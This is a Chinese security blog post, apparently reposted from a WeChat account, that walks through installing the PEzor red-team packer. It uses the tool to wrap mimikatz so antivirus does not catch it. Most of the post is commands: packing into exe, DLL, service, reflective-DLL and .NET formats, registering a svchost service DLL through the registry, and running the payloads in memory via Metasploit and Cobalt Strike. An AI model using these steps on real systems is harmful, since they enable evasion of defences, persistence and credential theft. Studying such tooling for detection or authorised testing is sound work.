红队的最新一款绕过AV的PE工具

admin 2021年4月13日08:00:50评论603 views字数 3281阅读10分56秒阅读模式
本文由海阳顶端授权发布    绍一款很强大的工具,
https://github.com/phra/PEzor,主要是用于通过反射来执行exe或shellcode,从而来绕过AV。
这款工具主要是安装稍微麻烦一点,需要在KAIL系统下安装。
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h

红队的最新一款绕过AV的PE工具

经过漫长的等待后,会给你安装Mingw-w64和LLVM / Clang的工具链。不过使用PEzor的时候,这时仍然会给你弹出一些错误提示。主要是环境变量和缺少了
https://github.com/EgeBalci/sgn。这里你需要做两步:
1、当前bash窗口导入PEzor的环境变量。
export PATH=$PATH:~/go/bin/:/home/kali/PEzor:/home/kali/PEzor/deps/donut_v0.9.3/:/home/kali/PEzor/deps/wclang/_prefix_PEzor_/bin/

红队的最新一款绕过AV的PE工具

2、下载
https://github.com/EgeBalci/sgn,解压后放入PEzor的目录。

红队的最新一款绕过AV的PE工具

一切就绪后,我们来看下它强大的功能。

红队的最新一款绕过AV的PE工具

我们以mimikatz来举几例具体用法。
一、生成变异的exe
# generate
$ PEzor -format=exe mimikatz.exe -z 2 -p '"token::whoami" "exit"'

# execute
C:> .mimikatz.exe.packed.exe
二、生成变异的DLL
# generate
$ PEzor -format=dll mimikatz.exe -z 2 -p '"token::whoami" "exit"'

# execute
C:> rundll32 .mimikatz.exe.packed.dll,DllMain
三、生成可以加载服务的变形exe
# generate
$ PEzor -format=service-exe mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'

# execute
C:UsersPublic> sc create mimiservice binpath= C:UsersPublicmimikatz.exe.packed.service.exe
[SC] CreateService SUCCESS

C:UsersPublic> sc start mimiservice
SERVICE_NAME : mimiservice
TYPE : 20 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 913
FLAGS : 0x0
四、生成可以加载服务的变形DLL
# generate
$ PEzor -format=service-dll mimikatz.exe -z 2 -p '"log C:/Users/Public/mimi.out" "coffee" "exit"'

# execute
C:UsersPublic> copy /y mimikatz.packed.exe.service.dll %SystemRoot%System32SvcHostDemo.dll
1 file(s) copied.

C:UsersPublic> sc create SvcHostDemo binpath= ^%SystemRoot^%"System32svchost -k mygroup" type= share start= demand
[SC] CreateService SUCCESS

C:UsersPublic> reg add "HKLMSYSTEMCurrentControlSetservicesSvcHostDemoParameters /v ServiceDll /t REG_EXPAND_SZ /d ^%SystemRoot^%System32SvcHostDemo.dll /f
The operation completed successfully.

C:UsersPublic> reg add "
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSvcHost" /v mygroup /t REG_MULTI_SZ /d SvcHostDemo /f
The operation completed successfully.

C:UsersPublic> sc start SvcHostDemo
SERVICE_NAME : SvcHostDemo
TYPE : 30 WIN32
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1823
FLAGS : 0x0
五、生成反射性的reflective-dll
# generate
$ PEzor -format=reflective-dll mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'

# execute

msf5 > use post/windows/manage/reflective_dll_inject
msf5 post(windows/manage/reflective_dll_inject) > set PATH mimikatz.exe.packed.reflective.dll
msf5 post(windows/manage/reflective_dll_inject) > set WAIT 10
msf5 post(windows/manage/reflective_dll_inject) > run

红队的最新一款绕过AV的PE工具

六、生成.NET的DLL
# generate
$ PEzor -format=dotnet mimikatz.exe -z 2 -p '"log mimi.out" "coffee" "exit"'

# execute

msf5 > use post/windows/manage/execute_dotnet_assembly
msf5 post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE mimikatz.exe.packed.dotnet.exe
msf5 post(windows/manage/execute_dotnet_assembly) > set WAIT 10
msf5 post(windows/manage/execute_dotnet_assembly) > run

红队的最新一款绕过AV的PE工具

七、另外,它也支持Cobalt Strike Integration
# convert and execute reflective DLL
beacon> execute-inmemory -format=reflective-dll mimikatz.exe -z 2 -p '"coffee" "exit"'

# convert and execute .NET assembly
beacon> execute-inmemory -format=dotnet mimikatz.exe -z 2 -p '"coffee" "exit"'

红队的最新一款绕过AV的PE工具

这个Cobalt Strike的插件地址在
https://github.com/phra/PEzor/blob/master/aggressor/PEzor.cna。

红队的最新一款绕过AV的PE工具


一如既往的学习,一如既往的整理,一如即往的分享。感谢支持红队的最新一款绕过AV的PE工具

“如侵权请私聊公众号删文”



扫描关注LemonSec

红队的最新一款绕过AV的PE工具

觉得不错点个“赞”、“在看”哦红队的最新一款绕过AV的PE工具


本文始发于微信公众号(LemonSec):红队的最新一款绕过AV的PE工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月13日08:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队的最新一款绕过AV的PE工具http://cn-sec.com/archives/333051.html

发表评论

匿名网友 填写信息